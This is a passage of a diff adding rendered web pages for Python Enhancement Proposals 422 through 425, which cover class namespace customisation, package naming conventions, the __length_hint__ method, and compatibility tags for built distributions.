+        # Convert subclasses to ordinary dictionaries
+        return cls.__dict__.copy()
+
+
+

It’s not clear why anyone would ever do this implicitly based on inheritance +rather than just using an explicit decorator, but the possibility seems worth +noting.

+
+
+
+

Open Questions

+
+

Is the namespace concept worth the extra complexity?

+

Unlike the new __autodecorate__ hook the proposed namespace keyword +argument is not automatically inherited by subclasses. Given the way this +proposal is currently written , the only way to get a special namespace used +consistently in subclasses is still to write a custom metaclass with a +suitable __prepare__ implementation.

+

Changing the custom namespace factory to also be inherited would +significantly increase the complexity of this proposal, and introduce a +number of the same potential base class conflict issues as arise with the +use of custom metaclasses.

+

Eric Snow has put forward a +separate proposal +to instead make the execution namespace for class bodies an ordered dictionary +by default, and capture the class attribute definition order for future +reference as an attribute (e.g. __definition_order__) on the class object.

+

Eric’s suggested approach may be a better choice for a new default behaviour +for type that combines well with the proposed __autodecorate__ hook, +leaving the more complex configurable namespace factory idea to a custom +metaclass like the one shown below.

+
+
+
+

New Ways of Using Classes

+

The new namespace keyword in the class header enables a number of +interesting options for controlling the way a class is initialised, +including some aspects of the object models of both Javascript and Ruby.

+

All of the examples below are actually possible today through the use of a +custom metaclass:

+
class CustomNamespace(type):
+    @classmethod
+    def __prepare__(meta, name, bases, *, namespace=None, **kwds):
+        parent_namespace = super().__prepare__(name, bases, **kwds)
+        return namespace() if namespace is not None else parent_namespace
+    def __new__(meta, name, bases, ns, *, namespace=None, **kwds):
+        return super().__new__(meta, name, bases, ns, **kwds)
+    def __init__(cls, name, bases, ns, *, namespace=None, **kwds):
+        return super().__init__(name, bases, ns, **kwds)
+
+
+

The advantage of implementing the new keyword directly in +type.__prepare__ is that the only persistent effect is then +the change in the underlying storage of the class attributes. The metaclass +of the class remains unchanged, eliminating many of the drawbacks +typically associated with these kinds of customisations.

+
+

Order preserving classes

+
class OrderedClass(namespace=collections.OrderedDict):
+    a = 1
+    b = 2
+    c = 3
+
+
+
+
+

Prepopulated namespaces

+
seed_data = dict(a=1, b=2, c=3)
+class PrepopulatedClass(namespace=seed_data.copy):
+    pass
+
+
+
+
+

Cloning a prototype class

+
class NewClass(namespace=Prototype.__dict__.copy):
+    pass
+
+
+
+
+

Extending a class

+
+

Note

+

Just because the PEP makes it possible to do this relatively +cleanly doesn’t mean anyone should do this!

+
+
from collections import MutableMapping
+
+# The MutableMapping + dict combination should give something that
+# generally behaves correctly as a mapping, while still being accepted
+# as a class namespace
+class ClassNamespace(MutableMapping, dict):
+    def __init__(self, cls):
+        self._cls = cls
+    def __len__(self):
+        return len(dir(self._cls))
+    def __iter__(self):
+        for attr in dir(self._cls):
+            yield attr
+    def __contains__(self, attr):
+        return hasattr(self._cls, attr)
+    def __getitem__(self, attr):
+        return getattr(self._cls, attr)
+    def __setitem__(self, attr, value):
+        setattr(self._cls, attr, value)
+    def __delitem__(self, attr):
+        delattr(self._cls, attr)
+
+def extend(cls):
+    return lambda: ClassNamespace(cls)
+
+class Example:
+    pass
+
+class ExtendedExample(namespace=extend(Example)):
+    a = 1
+    b = 2
+    c = 3
+
+>>> Example.a, Example.b, Example.c
+(1, 2, 3)
+
+
+
+
+
+

Rejected Design Options

+
+

Calling __autodecorate__ from type.__init__

+

Calling the new hook automatically from type.__init__, would achieve most +of the goals of this PEP. However, using that approach would mean that +__autodecorate__ implementations would be unable to call any methods that +relied on the __class__ reference (or used the zero-argument form of +super()), and could not make use of those features themselves.

+

The current design instead ensures that the implicit decorator hook is able +to do anything an explicit decorator can do by running it after the initial +class creation is already complete.

+
+
+

Calling the automatic decoration hook __init_class__

+

Earlier versions of the PEP used the name __init_class__ for the name +of the new hook. There were three significant problems with this name:

+
    +
  • it was hard to remember if the correct spelling was __init_class__ or +__class_init__
  • +
  • the use of “init” in the name suggested the signature should match that +of type.__init__, which is not the case
  • +
  • the use of “init” in the name suggested the method would be run as part +of initial class object creation, which is not the case
  • +
+

The new name __autodecorate__ was chosen to make it clear that the new +initialisation hook is most usefully thought of as an implicitly invoked +class decorator, rather than as being like an __init__ method.

+
+
+

Requiring an explicit decorator on __autodecorate__

+

Originally, this PEP required the explicit use of @classmethod on the +__autodecorate__ decorator. It was made implicit since there’s no +sensible interpretation for leaving it out, and that case would need to be +detected anyway in order to give a useful error message.

+

This decision was reinforced after noticing that the user experience of +defining __prepare__ and forgetting the @classmethod method +decorator is singularly incomprehensible (particularly since PEP 3115 +documents it as an ordinary method, and the current documentation doesn’t +explicitly say anything one way or the other).

+
+
+

Making __autodecorate__ implicitly static, like __new__

+

While it accepts the class to be instantiated as the first argument, +__new__ is actually implicitly treated as a static method rather than +as a class method. This allows it to be readily extracted from its +defining class and called directly on a subclass, rather than being +coupled to the class object it is retrieved from.

+

Such behaviour initially appears to be potentially useful for the +new __autodecorate__ hook, as it would allow __autodecorate__ +methods to readily be used as explicit decorators on other classes.

+

However, that apparent support would be an illusion as it would only work +correctly if invoked on a subclass, in which case the method can just as +readily be retrieved from the subclass and called that way. Unlike +__new__, there’s no issue with potentially changing method signatures at +different points in the inheritance chain.

+
+
+

Passing in the namespace directly rather than a factory function

+

At one point, this PEP proposed that the class namespace be passed +directly as a keyword argument, rather than passing a factory function. +However, this encourages an unsupported behaviour (that is, passing the +same namespace to multiple classes, or retaining direct write access +to a mapping used as a class namespace), so the API was switched to +the factory function version.

+
+
+
+

Reference Implementation

+

A reference implementation for __autodecorate__ has been posted to the +issue tracker. It uses the original __init_class__ naming. does not yet +allow the implicit decorator to replace the class with a different object and +does not implement the suggested namespace parameter for +type.__prepare__.

+
+
+

TODO

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0422.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0423/index.html b/pep-0423/index.html new file mode 100644 index 00000000000..e2d102e619e --- /dev/null +++ b/pep-0423/index.html @@ -0,0 +1,861 @@ + + + + + + + + PEP 423 – Naming conventions and recipes related to packaging | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 423 – Naming conventions and recipes related to packaging

+
+
Author:
+
Benoit Bryon <benoit at marmelune.net>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Deferred
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
24-May-2012
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This document deals with:

+
    +
  • names of Python projects,
  • +
  • names of Python packages or modules being distributed,
  • +
  • namespace packages.
  • +
+

It provides guidelines and recipes for distribution authors:

+ +
+
+

PEP Deferral

+

Further consideration of this PEP has been deferred at least until after +PEP 426 (package metadata 2.0) and related updates have been resolved.

+
+
+

Terminology

+

Reference is packaging terminology in Python documentation.

+
+
+

Relationship with other PEPs

+
    +
  • PEP 8 +deals with code style guide, including names of Python +packages and modules. It covers syntax of package/modules names.
  • +
  • PEP 345 deals with packaging metadata, and defines name argument +of the packaging.core.setup() function.
  • +
  • PEP 420 deals with namespace packages. It brings support of +namespace packages to Python core. Before, namespaces packages were +implemented by external libraries.
  • +
  • PEP 3108 deals with transition between Python 2.x and Python 3.x +applied to standard library: some modules to be deleted, some to be +renamed. It points out that naming conventions matter and is an +example of transition plan.
  • +
+
+
+

Overview

+

Here is a summarized list of guidelines you should follow to choose +names:

+ +
+
+

If in doubt, ask

+

If you feel unsure after reading this document, ask Python +community on IRC or on a mailing list.

+
+
+

Top-level namespace relates to code ownership

+

This helps avoid clashes between project names.

+

Ownership could be:

+
    +
  • an individual. +Example: gp.fileupload is owned and maintained by Gael +Pasgrimaud.
  • +
  • an organization. +Examples:
      +
    • zest.releaser is owned and maintained by Zest Software.
    • +
    • Django is owned and maintained by the Django Software +Foundation.
    • +
    +
  • +
  • a group or community. +Example: sphinx is maintained by developers of the Sphinx +project, not only by its author, Georg Brandl.
  • +
  • a group or community related to another package. +Example: collective.recaptcha is owned by its author: David +Glick, Groundwire. But the “collective” namespace is owned by Plone +community.
  • +
+
+

Respect ownership

+

Understand the purpose of namespace before you use it.

+

Don’t plug into a namespace you don’t own, unless explicitly +authorized.

+

If in doubt, ask.

+

As an example, don’t plug in “django.contrib” namespace because it is +managed by Django’s core contributors.

+

Exceptions can be defined by project authors. See Organize community +contributions below.

+

Also, this rule applies to non-Python projects.

+

As an example, don’t use “apache” as top-level namespace: “Apache” is +the name of an existing project (in the case of “Apache”, it is also a +trademark).

+
+
+

Private (including closed-source) projects use a namespace

+

… because private projects are owned by somebody. So apply the +ownership rule.

+

For internal/customer projects, use your company name as the +namespace.

+

This rule applies to closed-source projects.

+

As an example, if you are creating a “climbing” project for the +“Python Sport” company: use “pythonsport.climbing” name, even if it is +closed source.

+
+
+

Individual projects use a namespace

+

… because they are owned by individuals. So apply the +ownership rule.

+

There is no shame in releasing a project as open source even if it has +an “internal” or “individual” name.

+

If the project comes to a point where the author wants to change +ownership (i.e. the project no longer belongs to an individual), keep +in mind it is easy to rename the project.

+
+
+

Community-owned projects can avoid namespace packages

+

If your project is generic enough (i.e. it is not a contrib to another +product or framework), you can avoid namespace packages. The base +condition is generally that your project is owned by a group (i.e. the +development team) which is dedicated to this project.

+

Only use a “shared” namespace if you really intend the code to be +community owned.

+

As an example, sphinx project belongs to the Sphinx development +team. There is no need to have some “sphinx” namespace package with +only one “sphinx.sphinx” project inside.

+
+
+

In doubt, use an individual/organization namespace

+

If your project is really experimental, best choice is to use an +individual or organization namespace:

+
    +
  • it allows projects to be released early.
  • +
  • it won’t block a name if the project is abandoned.
  • +
  • it doesn’t block future changes. When a project becomes mature and +there is no reason to keep individual ownership, it remains +possible to rename the project.
  • +
+
+
+
+

Use a single name

+

Distribute only one package (or only one module) per project, and use +package (or module) name as project name.

+
    +
  • It avoids possible confusion between project name and distributed +package or module name.
  • +
  • It makes the name consistent.
  • +
  • It is explicit: when one sees project name, he guesses +package/module name, and vice versa.
  • +
  • It also limits implicit clashes between package/module names. +By using a single name, when you register a project name to PyPI, +you also perform a basic package/module name availability +verification.

    As an example, pipeline, python-pipeline and +django-pipeline all distribute a package or module called +“pipeline”. So installing two of them leads to errors. This issue +wouldn’t have occurred if these distributions used a single name.

    +
  • +
+

Yes:

+
    +
  • Package name: “kheops.pyramid”, +i.e. import kheops.pyramid
  • +
  • Project name: “kheops.pyramid”, +i.e. pip install kheops.pyramid
  • +
+

No:

+
    +
  • Package name: “kheops”
  • +
  • Project name: “KheopsPyramid”
  • +
+
+

Note

+

For historical reasons, PyPI contains many distributions where +project and distributed package/module names differ.

+
+
+

Multiple packages/modules should be rare

+

Technically, Python distributions can provide multiple packages and/or +modules. See setup script reference for details.

+

Some distributions actually do. +As an example, setuptools and distribute are both declaring +“pkg_resources”, “easy_install” and “site” modules in addition to +respective “setuptools” and “distribute” packages.

+

Consider this use case as exceptional. In most cases, you don’t need +this feature. So a distribution should provide only one package or +module at a time.

+
+
+

Distinct names should be rare

+

A notable exception to the Use a single name rule is when you +explicitly need distinct names.

+

As an example, the Pillow project provides an alternative to the +original PIL distribution. Both projects distribute a “PIL” +package.

+

Consider this use case as exceptional. In most cases, you don’t need +this feature. So a distributed package name should be equal to project +name.

+
+
+
+

Follow PEP 8 for syntax of package and module names

+

PEP 8 applies to names of Python packages and modules.

+

If you Use a single name, PEP 8 +also applies to project names. +The exceptions are namespace packages, where dots are required in +project name.

+
+
+

Pick memorable names

+

One important thing about a project name is that it be memorable.

+

As an example, celery is not a meaningful name. At first, it is not +obvious that it deals with message queuing. But it is memorable, +partly because it can be used to feed a RabbitMQ server.

+
+
+

Pick meaningful names

+

Ask yourself “how would I describe in one sentence what this name is +for?”, and then “could anyone have guessed that by looking at the +name?”.

+

As an example, DateUtils is a meaningful name. It is obvious that +it deals with utilities for dates.

+

When you are using namespaces, try to make each part meaningful.

+
+
+

Use packaging metadata

+

Consider project names as unique identifiers on PyPI:

+
    +
  • it is important that these identifiers remain human-readable.
  • +
  • it is even better when these identifiers are meaningful.
  • +
  • but the primary purpose of identifiers is not to classify or +describe projects.
  • +
+

Classifiers and keywords metadata are made for categorization of +distributions. Summary and description metadata are meant to +describe the project.

+

As an example, there is a “Framework :: Twisted” classifier. Even +if names are quite heterogeneous (they don’t follow a particular +pattern), we get the list.

+

In order to Organize community contributions, conventions about +names and namespaces matter, but conventions about metadata should be +even more important.

+

As an example, we can find Plone portlets in many places:

+
    +
  • plone.portlet.*
  • +
  • collective.portlet.*
  • +
  • collective.portlets.*
  • +
  • collective.*.portlets
  • +
  • some vendor-related projects such as “quintagroup.portlet.cumulus”
  • +
  • and even projects where “portlet” pattern doesn’t appear in the +name.
  • +
+

Even if Plone community has conventions, using the name to categorize +distributions is inappropriate. It’s impossible to get the full list of +distributions that provide portlets for Plone by filtering on names. +But it would be possible if all these distributions used +“Framework :: Plone” classifier and “portlet” keyword.

+
+
+

Avoid deep nesting

+

The Zen of Python says “Flat is better than nested”.

+
+

Two levels is almost always enough

+

Don’t define everything in deeply nested hierarchies: you will end up +with projects and packages like “pythonsport.common.maps.forest”. This +type of name is both verbose and cumbersome (e.g. if you have many +imports from the package).

+

Furthermore, big hierarchies tend to break down over time as the +boundaries between different packages blur.

+

The consensus is that two levels of nesting are preferred.

+

For example, we have plone.principalsource instead of +plone.source.principal or something like that. The name is +shorter, the package structure is simpler, and there would be very +little to gain from having three levels of nesting here. It would be +impractical to try to put all “core Plone” sources (a source is kind +of vocabulary) into the plone.source.* namespace, in part because +some sources are part of other packages, and in part because sources +already exist in other places. Had we made a new namespace, it would +be inconsistently used from the start.

+

Yes: “pyranha”

+

Yes: “pythonsport.climbing”

+

Yes: “pythonsport.forestmap”

+

No: “pythonsport.maps.forest”

+
+
+

Use only one level for ownership

+

Don’t use 3 levels to set individual/organization ownership in +a community namespace.

+

As an example, let’s consider:

+
    +
  • you are plugging into a community namespace, such as “collective”.
  • +
  • and you want to add a more restrictive “ownership” level, to avoid +clashes inside the community.
  • +
+

In such a case, you’d better use the most restrictive ownership +level as first level.

+

As an example, where “collective” is a major community namespace that +“gergovie” belongs to, and “vercingetorix” it the name of “gergovie” +author:

+

No: “collective.vercingetorix.gergovie”

+

Yes: “vercingetorix.gergovie”

+
+
+

Don’t use namespace levels for categorization

+

Use packaging metadata instead.

+
+
+

Don’t use more than 3 levels

+

Technically, you can create deeply nested hierarchies. However, in +most cases, you shouldn’t need it.

+
+

Note

+

Even communities where namespaces are standard don’t use more than +3 levels.

+
+
+
+ +
+

Register names with PyPI

+

PyPI is the central place for distributions in Python community. +So, it is also the place where to register project and package names.

+

See Registering with the Package Index for details.

+
+
+

Recipes

+

The following recipes will help you follow the guidelines and +conventions above.

+
+

How to check for name availability?

+

Before you choose a project name, make sure it hasn’t already been +registered in the following locations:

+
    +
  • PyPI
  • +
  • that’s all. PyPI is the only official place.
  • +
+

As an example, you could also check in various locations such as +popular code hosting services, but keep in mind that PyPI is the only +place you can register for names in Python community.

+

That’s why it is important you register names with PyPI.

+

Also make sure the names of distributed packages or modules haven’t +already been registered:

+ +

The use a single name rule also helps you avoid clashes with +package names: if a project name is available, then the package name +has good chances to be available too.

+
+
+

How to rename a project?

+

Renaming a project is possible, but keep in mind that it will cause +some confusions. So, pay particular attention to README and +documentation, so that users understand what happened.

+
    +
  1. First of all, do not remove legacy distributions from PyPI. +Because some users may be using them.
  2. +
  3. Copy the legacy project, then change names (project and +package/module). Pay attention to, at least:
      +
    • packaging files,
    • +
    • folder name that contains source files,
    • +
    • documentation, including README,
    • +
    • import statements in code.
    • +
    +
  4. +
  5. Assign Obsoletes-Dist metadata to new distribution in setup.cfg +file. See PEP 345 about Obsolete-Dist +and setup.cfg +specification.
  6. +
  7. Release a new version of the renamed project, then publish it.
  8. +
  9. Edit legacy project:
      +
    • add dependency to new project,
    • +
    • drop everything except packaging stuff,
    • +
    • add the Development Status :: 7 - Inactive classifier in +setup script,
    • +
    • publish a new release.
    • +
    +
  10. +
+

So, users of the legacy package:

+
    +
  • can continue using the legacy distributions at a deprecated version,
  • +
  • can upgrade to last version of legacy distribution, which is +empty…
  • +
  • … and automatically download new distribution as a dependency of +the legacy one.
  • +
+

Users who discover the legacy project see it is inactive.

+
+

Improved handling of renamed projects on PyPI

+

If many projects follow Renaming howto +recipe, then many legacy distributions will have the following +characteristics:

+
    +
  • Development Status :: 7 - Inactive classifier.
  • +
  • latest version is empty, except packaging stuff.
  • +
  • latest version “redirects” to another distribution. E.g. it has a +single dependency on the renamed project.
  • +
  • referenced as Obsoletes-Dist in a newer distribution.
  • +
+

So it will be possible to detect renamed projects and improve +readability on PyPI. So that users can focus on active distributions. +But this feature is not required now. There is no urge. It won’t be +covered in this document.

+
+
+
+

How to apply naming guidelines on existing projects?

+

There is no obligation for existing projects to be renamed. The +choice is left to project authors and mainteners for obvious reasons.

+

However, project authors are invited to:

+ +
+

State about current naming

+

The important thing, at first, is that you state about current +choices:

+
    +
  • Ask yourself “why did I choose the current name?”, then document it.
  • +
  • If there are differences with the guidelines provided in this +document, you should tell your users.
  • +
  • If possible, create issues in the project’s bugtracker, at least for +record. Then you are free to resolve them later, or maybe mark them +as “wontfix”.
  • +
+

Projects that are meant to receive contributions from community should +also organize community contributions.

+
+
+

Promote migrations

+

Every Python developer should migrate whenever possible, or promote +the migrations in their respective communities.

+

Apply these guidelines on your projects, then the community will see +it is safe.

+

In particular, “leaders” such as authors of popular projects are +influential, they have power and, thus, responsibility over +communities.

+

Apply these guidelines on popular projects, then communities will +adopt the conventions too.

+

Projects should promote migrations when they release a new (major) +version, particularly if this version introduces support for +Python 3.x, new standard library’s packaging or namespace packages.

+
+
+

Opportunity

+

As of Python 3.3 being developed:

+
    +
  • many projects are not Python 3.x compatible. It includes “big” +products or frameworks. It means that many projects will have to do +a migration to support Python 3.x.
  • +
  • packaging (aka distutils2) is on the starting blocks. When it is +released, projects will be invited to migrate and use new packaging.
  • +
  • PEP 420 brings official support of namespace packages to Python.
  • +
+

It means that most active projects should be about to migrate in the +next year(s) to support Python 3.x, new packaging or new namespace +packages.

+

Such an opportunity is unique and won’t come again soon! +So let’s introduce and promote naming conventions as soon as possible +(i.e. now).

+
+
+
+
+

References

+

Additional background:

+ +

References and footnotes:

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0423.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0424/index.html b/pep-0424/index.html new file mode 100644 index 00000000000..f962250d871 --- /dev/null +++ b/pep-0424/index.html @@ -0,0 +1,197 @@ + + + + + + + + PEP 424 – A method for exposing a length hint | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 424 – A method for exposing a length hint

+
+
Author:
+
Alex Gaynor <alex.gaynor at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
14-Jul-2012
+
Python-Version:
+
3.4
+
Post-History:
+
15-Jul-2012
+
+
+
+
Table of Contents +
+
+

Abstract

+

CPython currently defines a __length_hint__ method on several +types, such as various iterators. This method is then used by various +other functions (such as list) to presize lists based on the +estimate returned by __length_hint__. Types which are not sized, +and thus should not define __len__, can then define +__length_hint__, to allow estimating or computing a size (such as +many iterators).

+
+
+

Specification

+

This PEP formally documents __length_hint__ for other interpreters +and non-standard-library Python modules to implement.

+

__length_hint__ must return an integer (else a TypeError is +raised) or NotImplemented, and is not required to be accurate. It +may return a value that is either larger or smaller than the actual +size of the container. A return value of NotImplemented indicates +that there is no finite length estimate. It may not return a negative +value (else a ValueError is raised).

+

In addition, a new function operator.length_hint hint is added, +with the following semantics (which define how __length_hint__ +should be used):

+
def length_hint(obj, default=0):
+    """Return an estimate of the number of items in obj.
+
+    This is useful for presizing containers when building from an
+    iterable.
+
+    If the object supports len(), the result will be
+    exact. Otherwise, it may over- or under-estimate by an
+    arbitrary amount. The result will be an integer >= 0.
+    """
+    try:
+        return len(obj)
+    except TypeError:
+        try:
+            get_hint = type(obj).__length_hint__
+        except AttributeError:
+            return default
+        try:
+            hint = get_hint(obj)
+        except TypeError:
+            return default
+        if hint is NotImplemented:
+            return default
+        if not isinstance(hint, int):
+            raise TypeError("Length hint must be an integer, not %r" %
+                            type(hint))
+        if hint < 0:
+            raise ValueError("__length_hint__() should return >= 0")
+        return hint
+
+
+
+
+

Rationale

+

Being able to pre-allocate lists based on the expected size, as +estimated by __length_hint__, can be a significant optimization. +CPython has been observed to run some code faster than PyPy, purely +because of this optimization being present.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0424.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0425/index.html b/pep-0425/index.html new file mode 100644 index 00000000000..4e1af52b1cc --- /dev/null +++ b/pep-0425/index.html @@ -0,0 +1,398 @@ + + + + + + + + PEP 425 – Compatibility Tags for Built Distributions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 425 – Compatibility Tags for Built Distributions

+
+
Author:
+
Daniel Holth <dholth at gmail.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
27-Jul-2012
+
Python-Version:
+
3.4
+
Post-History:
+
08-Aug-2012, 18-Oct-2012, 15-Feb-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Platform compatibility tags, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP specifies a tagging system to indicate with which versions of +Python a built or binary distribution is compatible. A set of three +tags indicate which Python implementation and language version, ABI, +and platform a built distribution requires. The tags are terse because +they will be included in filenames.

+
+
+

PEP Acceptance

+

This PEP was accepted by Alyssa Coghlan on 17th February, 2013.

+
+
+

Rationale

+

Today “python setup.py bdist” generates the same filename on PyPy +and CPython, but an incompatible archive, making it inconvenient to +share built distributions in the same folder or index. Instead, built +distributions should have a file naming convention that includes enough +information to decide whether or not a particular archive is compatible +with a particular implementation.

+

Previous efforts come from a time where CPython was the only important +implementation and the ABI was the same as the Python language release. +This specification improves upon the older schemes by including the Python +implementation, language version, ABI, and platform as a set of tags.

+

By comparing the tags it supports with the tags listed by the +distribution, an installer can make an educated decision about whether +to download a particular built distribution without having to read its +full metadata.

+
+
+

Overview

+

The tag format is {python tag}-{abi tag}-{platform tag}

+
+
python tag
‘py27’, ‘cp33’
+
abi tag
‘cp32dmu’, ‘none’
+
platform tag
‘linux_x86_64’, ‘any’
+
+

For example, the tag py27-none-any indicates compatible with Python 2.7 +(any Python 2.7 implementation) with no abi requirement, on any platform.

+
+
+

Use

+

The wheel built package format includes these tags in its filenames, +of the form {distribution}-{version}(-{build tag})?-{python tag}-{abi +tag}-{platform tag}.whl. Other package formats may have their own +conventions.

+
+
+

Details

+
+

Python Tag

+

The Python tag indicates the implementation and version required by +a distribution. Major implementations have abbreviated codes, initially:

+
    +
  • py: Generic Python (does not require implementation-specific features)
  • +
  • cp: CPython
  • +
  • ip: IronPython
  • +
  • pp: PyPy
  • +
  • jy: Jython
  • +
+

Other Python implementations should use sys.implementation.name.

+

The version is py_version_nodot. CPython gets away with no dot, +but if one is needed the underscore _ is used instead. PyPy should +probably use its own versions here pp18, pp19.

+

The version can be just the major version 2 or 3 py2, py3 for +many pure-Python distributions.

+

Importantly, major-version-only tags like py2 and py3 are not +shorthand for py20 and py30. Instead, these tags mean the packager +intentionally released a cross-version-compatible distribution.

+

A single-source Python 2/3 compatible distribution can use the compound +tag py2.py3. See Compressed Tag Sets, below.

+
+
+

ABI Tag

+

The ABI tag indicates which Python ABI is required by any included +extension modules. For implementation-specific ABIs, the implementation +is abbreviated in the same way as the Python Tag, e.g. cp33d would be +the CPython 3.3 ABI with debugging.

+

The CPython stable ABI is abi3 as in the shared library suffix.

+

Implementations with a very unstable ABI may use the first 6 bytes (as +8 base64-encoded characters) of the SHA-256 hash of their source code +revision and compiler flags, etc, but will probably not have a great need +to distribute binary distributions. Each implementation’s community may +decide how to best use the ABI tag.

+
+
+

Platform Tag

+

The platform tag is simply distutils.util.get_platform() with all +hyphens - and periods . replaced with underscore _.

+
    +
  • win32
  • +
  • linux_i386
  • +
  • linux_x86_64
  • +
+
+
+
+

Use

+

The tags are used by installers to decide which built distribution +(if any) to download from a list of potential built distributions. +The installer maintains a list of (pyver, abi, arch) tuples that it +will support. If the built distribution’s tag is in the list, then +it can be installed.

+

It is recommended that installers try to choose the most feature complete +built distribution available (the one most specific to the installation +environment) by default before falling back to pure Python versions +published for older Python releases. Installers are also recommended to +provide a way to configure and re-order the list of allowed compatibility +tags; for example, a user might accept only the *-none-any tags to only +download built packages that advertise themselves as being pure Python.

+

Another desirable installer feature might be to include “re-compile from +source if possible” as more preferable than some of the compatible but +legacy pre-built options.

+

This example list is for an installer running under CPython 3.3 on a +linux_x86_64 system. It is in order from most-preferred (a distribution +with a compiled extension module, built for the current version of +Python) to least-preferred (a pure-Python distribution built with an +older version of Python):

+
    +
  1. cp33-cp33m-linux_x86_64
  2. +
  3. cp33-abi3-linux_x86_64
  4. +
  5. cp3-abi3-linux_x86_64
  6. +
  7. cp33-none-linux_x86_64*
  8. +
  9. cp3-none-linux_x86_64*
  10. +
  11. py33-none-linux_x86_64*
  12. +
  13. py3-none-linux_x86_64*
  14. +
  15. cp33-none-any
  16. +
  17. cp3-none-any
  18. +
  19. py33-none-any
  20. +
  21. py3-none-any
  22. +
  23. py32-none-any
  24. +
  25. py31-none-any
  26. +
  27. py30-none-any
  28. +
+
    +
  • Built distributions may be platform specific for reasons other than C +extensions, such as by including a native executable invoked as +a subprocess.
  • +
+

Sometimes there will be more than one supported built distribution for a +particular version of a package. For example, a packager could release +a package tagged cp33-abi3-linux_x86_64 that contains an optional C +extension and the same distribution tagged py3-none-any that does not. +The index of the tag in the supported tags list breaks the tie, and the +package with the C extension is installed in preference to the package +without because that tag appears first in the list.

+
+
+

Compressed Tag Sets

+

To allow for compact filenames of bdists that work with more than +one compatibility tag triple, each tag in a filename can instead be a +‘.’-separated, sorted, set of tags. For example, pip, a pure-Python +package that is written to run under Python 2 and 3 with the same source +code, could distribute a bdist with the tag py2.py3-none-any. +The full list of simple tags is:

+
for x in pytag.split('.'):
+    for y in abitag.split('.'):
+        for z in archtag.split('.'):
+            yield '-'.join((x, y, z))
+
+
+

A bdist format that implements this scheme should include the expanded +tags in bdist-specific metadata. This compression scheme can generate +large numbers of unsupported tags and “impossible” tags that are supported +by no Python implementation e.g. “cp33-cp31u-win64”, so use it sparingly.

+
+
+

FAQ

+
+
What tags are used by default?
Tools should use the most-preferred architecture dependent tag +e.g. cp33-cp33m-win32 or the most-preferred pure python tag +e.g. py33-none-any by default. If the packager overrides the +default it indicates that they intended to provide cross-Python +compatibility.
+
What tag do I use if my distribution uses a feature exclusive to the newest version of Python?
Compatibility tags aid installers in selecting the most compatible +build of a single version of a distribution. For example, when +there is no Python 3.3 compatible build of beaglevote-1.2.0 +(it uses a Python 3.4 exclusive feature) it may still use the +py3-none-any tag instead of the py34-none-any tag. A Python +3.3 user must combine other qualifiers, such as a requirement for the +older release beaglevote-1.1.0 that does not use the new feature, +to get a compatible build.
+
Why isn’t there a . in the Python version number?
CPython has lasted 20+ years without a 3-digit major release. This +should continue for some time. Other implementations may use _ as +a delimiter, since both - and . delimit the surrounding filename.
+
Why normalise hyphens and other non-alphanumeric characters to underscores?
To avoid conflicting with the “.” and “-” characters that separate +components of the filename, and for better compatibility with the +widest range of filesystem limitations for filenames (including +being usable in URL paths without quoting).
+
Why not use special character <X> rather than “.” or “-“?
Either because that character is inconvenient or potentially confusing +in some contexts (for example, “+” must be quoted in URLs, “~” is +used to denote the user’s home directory in POSIX), or because the +advantages weren’t sufficiently compelling to justify changing the +existing reference implementation for the wheel format defined in PEP +427 (for example, using “,” rather than “.” to separate components +in a compressed tag).
+
Who will maintain the registry of abbreviated implementations?
New two-letter abbreviations can be requested on the python-dev +mailing list. As a rule of thumb, abbreviations are reserved for +the current 4 most prominent implementations.
+
Does the compatibility tag go into METADATA or PKG-INFO?
No. The compatibility tag is part of the built distribution’s +metadata. METADATA / PKG-INFO should be valid for an entire +distribution, not a single build of that distribution.
+
Why didn’t you mention my favorite Python implementation?
The abbreviated tags facilitate sharing compiled Python code in a +public index. Your Python implementation can use this specification +too, but with longer tags. +Recall that all “pure Python” built distributions just use ‘py’.
+
Why is the ABI tag (the second tag) sometimes “none” in the reference implementation?
Since Python 2 does not have an easy way to get to the SOABI +(the concept comes from newer versions of Python 3) the reference +implementation at the time of writing guesses “none”. Ideally it +would detect “py27(d|m|u)” analogous to newer versions of Python, +but in the meantime “none” is a good enough way to say “don’t know”.
+
+
+
+

References

+

[1] Egg Filename-Embedded Metadata + (http://peak.telecommunity.com/DevCenter/EggFormats#filename-embedded-metadata)

+

[2] Creating Built Distributions + (https://docs.python.org/3.4/distutils/builtdist.html)

+
+
+

Acknowledgements

+

The author thanks Paul Moore, Alyssa Coghlan, Marc Abramowitz, and +Mr. Michele Lacchia for their valuable help and advice.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0425.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
